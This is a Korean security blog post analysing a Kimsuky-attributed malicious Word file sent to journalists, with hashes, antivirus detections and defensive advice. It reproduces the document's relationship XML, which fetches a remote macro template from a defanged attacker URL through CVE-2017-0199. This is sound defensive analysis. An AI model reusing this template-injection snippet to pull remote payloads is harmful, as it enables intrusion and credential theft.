꿈을꾸는 파랑새

오늘은 해당 악성코드는 최근 한국의 방송사 기자를 대상으로 APT 공격 시도를 위한 악성 워드 문서 파일을 유포 중인 것을 확인했습니다. 일단 이메일 파일이 전송되면 이메일 안에는 파일명이 사내 금융업무 상세내역.docx으로 돼 있는 악성코드가 포함돼 있습니다.
해당 악성 워드 문서를 실행하면 백그라운드 에서는 External URL을 이용하여 워드 매크로(dotm) 파일을 내려받아 실행합니다.

사내 금융업무 상세 내역
사내 금융업무 상세 내역

http://ms-work.com-info(.)store/dms/0203.dotm

이며 해당 파일 해쉬값은 다음과 같습니다.
파일명:사내 금융업무 상세 내역.doc
사이즈:106 KB
CRC32:8771aa41
MD5:f5a18dc727c19624bcd47f03c0713b4b
SHA-1:ed4cc1680d22debbe8d7b4d23ddb836ff8c189f0
SHA-256:34bcf8880772bdeccaa98a96f39136dff24ceda05eee70f06f774d3ad3369094
SHA-512:37043e9c08f6d3099a60ab20db8abcad0498986aed39e998631951f9b57b2d6f45710dcc0a7fc594119be9397370a93b1ace77a09fdab9e96d977927d0600cb4

사내 금융업무 상세 내역 속성
사내 금융업무 상세 내역 속성

지난 시간에 소개해 드린 북한 해커 단체 Kimsuky(김수키) 워드문서를 악용한 APT 공격 악성코드하고 내용은 똑같습니다.
해당 악성코드는 CVE-2017-0199 취약점을 악용하고 있으며 해당 악성코드 취약점은 Microsoft Office 및 워드 패드가 특수 제작된 파일을 구문 분석하는 방식에 원격 코드 실행 취약성이 존재하며 해당 취약성 악용에 성공한 공격자는 영향받는 시스템을 제어할 수 있으며 공격자가 프로그램을 설치하거나, 데이터를 보거나 변경하거나 삭제하거나, 모든 사용자 권한이 있는 새 계정을 만들 수 있습니다.

[소프트웨어 팁/보안 및 분석] - 북한 해커 단체 Kimsuky(김수키) 워드문서를 악용한 APT공격

 

북한 해커 단체 Kimsuky(김수키) 워드문서를 악용한 APT공격

해당 악성코드는 최근 한국의 방송사 기자를 대상으로 APT 공격 시도를 위한 악성 워드 문서 파일을 유포 중인 것을 확인했습니다. 일단 이메일 파일이 전송되면 이메일 안에는

wezard4u.tistory.com


전자 메일공격 시나리오에서 공격자는 특수 제작된 파일을 사용자에게 보내고 사용자가 이 파일을 열도록 유도하여 해당 취약성을 악용할 수 있습니다.
그리고 해당 악성코드 문서 에 포함된 외부 링크는 다음과 같습니다.

사내 금융업무 상세 내역 워드에 포함이 된 악성코드 주소
사내 금융업무 상세 내역 워드에 포함이 된 악성코드 주소

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats(.)org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats(.)org/officeDocument/2006/relationships/attachedTemplate" 
Target="http://ms-work.com-info(.)store/dms/0203.dotm" TargetMode="External" /></Relationships>

다운로드된 0203(.)dotm 이름의 워드 매크로 파일을 실행하려고 하면 한국에서는 불법 유해 사이트로 지정돼 있어서 더는 악성코드는 진행되지 않습니다.
일단 더 자세하게 진행을 하지 못했지만, 과거 정보를 통해서 다음 같은 정보에 접근할 수가 있을 것입니다.
브라우저 계정 및 쿠키 값(구글 크롬, 마이크로 소프트 엣지/파이어폭스)
윈도우 증명서 관련 정보
WinSCP 계정 정보
ThunderBird 계정 정보

사내 금융업무 상세 내역 악성코드 차단
사내 금융업무 상세 내역 악성코드 차단

2022-09-17 22:08:49 UTC 기준으로 바이러스토탈에서 탐지를 하는 보안 업체들은 다음과 같습니다.
Ad-Aware:Trojan.Generic.31667114
Alibaba:Exploit:Office97/CVE-2017-0199.d05e040f
ALYac:Trojan.Downloader.DOC.Gen
Antiy-AVL:Trojan/Generic.ASHMacro.7D6
Avast:Other:Malware-gen [Trj]
AVG:Other:Malware-gen [Trj]
Avira (no cloud):W97M/Dldr.Agent.ajr
BitDefender:Trojan.Generic.31667114
Cynet:Malicious (score: 99)
Cyren:URL/CVE170199.AG.gen!Eldorado
DrWeb:X97M.DownLoader.1060
Emsisoft:Trojan.Generic.31667114 (B)
eScan:Trojan.Generic.31667114
ESET-NOD32:VBA/Subdoc.B
Fortinet:MSWord/Agent.ARJ!exploit
GData:XML.Trojan.Agent.HOUFLR
Google:Detected
Kaspersky:HEUR:Trojan-Downloader.MSOffice.Dotmer.gen
Lionic:Trojan.MSOffice.Dotmer.a!c
MAX:Malware (ai Score=82)
McAfee:Exploit-CVE-2017-0199.b
McAfee-GW-Edition:Exploit-CVE-2017-0199.b
Microsoft:Exploit:O97M/CVE-2017-0199.BKU!MTB
NANO-Antivirus:Exploit.Xml.CVE-2017-0199.equmby
QuickHeal:XML.Downloader.45678
Rising:Exploit.ExtLink/OFFICE!1.C97A (CLASSIC)
Symantec:Trojan.Gen.NPE
TACHYON:Suspicious/WOX.Downloader.Gen
Tencent:Trojan.Win32.Office_Dl.11018835
Trellix (FireEye):Trojan.Generic.31667114
VIPRE:Trojan.Generic.31667114
ViRobot:DOC.Z.CVE-2017-0199.109222
해당 악성코드를 제작하는 김수키(Kimsuky)는 지속적으로 대북 관련 내용으로 국방부, 국회의원, 대북 관련에 종사하시는 분들을 타켓으로 하는 악성코드입니다.
일단 기본적으로 언제나 기초적인 것은 기본적으로 공식적으로 AV-TEST에서 공식적으로 인정받는 보안프로그램을 설치해서 실시간 감시, 실시간 업데이트 그리고 마이크로소프트 오피스 에서 매크로를 사용하는 것은 항상 신중하게 선택을 해야 하면
그리고 이메일도 신뢰성 있는 사람을 해킹해서 이메일 보낼 수가 있으며 항상 조심하며 기본적인 보안 수칙을 지키는 것이 안전하게 컴퓨터를 사용하는 방법이면 귀찮더라도 백신 프로그램,윈도우 업데이트,각종 드라이버 업데이트,프로그램 최신 업데이트 그리고 프로그램에서 걸어 놓은 최소한의 보안 장치들을 해제하는 것을 하지 말아야 합니다.

728x90
반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band